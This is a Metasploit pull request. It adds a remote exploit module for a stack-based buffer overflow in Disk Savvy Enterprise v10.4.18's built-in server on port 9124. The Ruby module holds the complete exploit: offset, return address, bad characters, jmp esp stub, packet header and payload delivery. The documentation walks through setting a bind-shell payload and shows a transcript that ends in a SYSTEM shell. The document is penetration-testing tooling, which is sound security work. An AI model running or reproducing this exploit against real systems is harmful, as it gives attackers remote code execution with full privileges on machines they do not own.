### PR TITLE
Disk Savvy Enterprise v10.4.18 built-in server buffer overflow

### DIFF
--- a/documentation/modules/exploit/windows/misc/disk_savvy_adm.md
+++ b/documentation/modules/exploit/windows/misc/disk_savvy_adm.md
@@ -1,0 +1,39 @@
+## Vulnerable Application
+
+[DiskSavvy Enterprise](http://www.disksavvy.com/) version v10.4.18, affected by a stack-based buffer overflow vulnerability caused by improper bounds checking of the request sent to the built-in server which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target.. This module has been tested successfully on Windows 7 SP1 x86. The vulnerable application is available for download at [DiskSavvy Enterprise](http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe).
+
+## Verification Steps
+    1. Install a vulnerable DiskSavvy Enterprise
+  6. Start `msfconsole`
+    3. Do `exploit/windows/misc/disk_savvy_adm`
+    4. Do `set RHOST ip`
+    5. Do `set PAYLOAD windows/shell/bind_tcp`
+  13. Do `exploit`
+    7. Enjoy you shell
+
+## Scenarios
+
+###DiskSavvy Enterprise v10.4.18 on Windows 7 SP1 x86
+
+```
+msf > use exploit/windows/misc/disk_savvy_adm 
+msf exploit(windows/misc/disk_savvy_adm) > set RHOST 192.168.216.55
+RHOST => 192.168.216.55
+msf exploit(windows/misc/disk_savvy_adm) > set payload windows/shell/bind_tcp
+payload => windows/shell/bind_tcp
+msf exploit(windows/misc/disk_savvy_adm) > exploit 
+
+[*] Started bind handler
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 192.168.216.55
+[*] Command shell session 1 opened (192.168.216.5:36113 -> 192.168.216.55:4444) at 2018-02-14 15:19:02 -0500
+
+Microsoft Windows [Version 6.1.7601]
+Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
+
+C:\Windows\system32>whoami      
+whoami
+nt authority\system
+
+C:\Windows\system32>
+```

--- a/documentation/modules/exploit/windows/misc/disk_savvy_adm.md
+++ b/documentation/modules/exploit/windows/misc/disk_savvy_adm.md
@@ -3,13 +3,13 @@
 [DiskSavvy Enterprise](http://www.disksavvy.com/) version v10.4.18, affected by a stack-based buffer overflow vulnerability caused by improper bounds checking of the request sent to the built-in server which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target.. This module has been tested successfully on Windows 7 SP1 x86. The vulnerable application is available for download at [DiskSavvy Enterprise](http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe).
 
 ## Verification Steps
-    1. Install a vulnerable DiskSavvy Enterprise
-  6. Start `msfconsole`
-    3. Do `exploit/windows/misc/disk_savvy_adm`
-    4. Do `set RHOST ip`
-    5. Do `set PAYLOAD windows/shell/bind_tcp`
-  13. Do `exploit`
-    7. Enjoy you shell
+  1. Install a vulnerable DiskSavvy Enterprise
+  2. Start `msfconsole`
+  3. Do `exploit/windows/misc/disk_savvy_adm`
+  4. Do `set RHOST ip`
+  5. Do `set PAYLOAD windows/shell/bind_tcp`
+  6. Do `exploit`
+  7. Enjoy you shell
 
 ## Scenarios
 

--- a/modules/exploits/windows/misc/disk_savvy_adm.rb
+++ b/modules/exploits/windows/misc/disk_savvy_adm.rb
@@ -1,0 +1,76 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Disk Savvy Enterprise v10.4.18',
+      'Description'    => %q{
+        This module exploits a stack-based buffer overflow vulnerability
+        in Disk Savvy Enterprise v10.4.18, caused by improper bounds 
+        checking of the request sent to the built-in server. This module 
+        has been tested successfully on Windows 7 SP1 x86.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Daniel Teixeira'
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread'
+        },
+      'Platform'       => 'win',
+      'Payload'        =>
+        {
+          'BadChars'   => "\x00\x02\x0a\x0d\xf8",
+          'Space'      => 355
+        },
+      'Targets'        =>
+        [
+          [ 'Disk Savvy Enterprise v10.4.18',
+            {
+              'Offset' => 124,
+              'Ret'    => 0x10056d13
+            }
+          ]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Jan 31 2017',
+      'DefaultTarget'  => 0))
+
+    register_options([Opt::RPORT(9124)])
+
+  end
+
+  def exploit
+    connect
+
+    buffer = make_nops(target['Offset'])
+    buffer << "\x90\x09\xEB\x05"
+    buffer << [target.ret].pack('V')
+    buffer << make_nops(10)
+    buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,100").encode_string * 20
+    buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp esp").encode_string
+    buffer << make_nops(441)
+    buffer << payload.encoded
+
+    header = "\x75\x19\xba\xab"
+    header << "\x03\x00\x00\x00"
+    header << "\x00\x40\x00\x00"
+    header << [buffer.length].pack("V")
+    header << [buffer.length].pack("V")
+    header << [buffer[-1].ord].pack("V")
+    packet = header
+    packet << buffer
+
+    sock.put(packet)
+    handler
+  end
+end

--- a/modules/exploits/windows/misc/disk_savvy_adm.rb
+++ b/modules/exploits/windows/misc/disk_savvy_adm.rb
@@ -13,8 +13,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name'           => 'Disk Savvy Enterprise v10.4.18',
       'Description'    => %q{
         This module exploits a stack-based buffer overflow vulnerability
-        in Disk Savvy Enterprise v10.4.18, caused by improper bounds 
-        checking of the request sent to the built-in server. This module 
+        in Disk Savvy Enterprise v10.4.18, caused by improper bounds
+        checking of the request sent to the built-in server. This module
         has been tested successfully on Windows 7 SP1 x86.
       },
       'License'        => MSF_LICENSE,


### PR DESCRIPTION
This PR adds a module to exploit a buffer overflow in Disk Savvy Enterprise v10.4.18 built-in server.

## Verification

List the steps needed to make sure this thing works

- [x] Install the application
- [x] Start `msfconsole`
- [x] `use exploit/windows/misc/disk_savvy_adm`
- [x] `set RHOST`
- [x] `set payload windows/shell/bind_tcp`
- [x] Run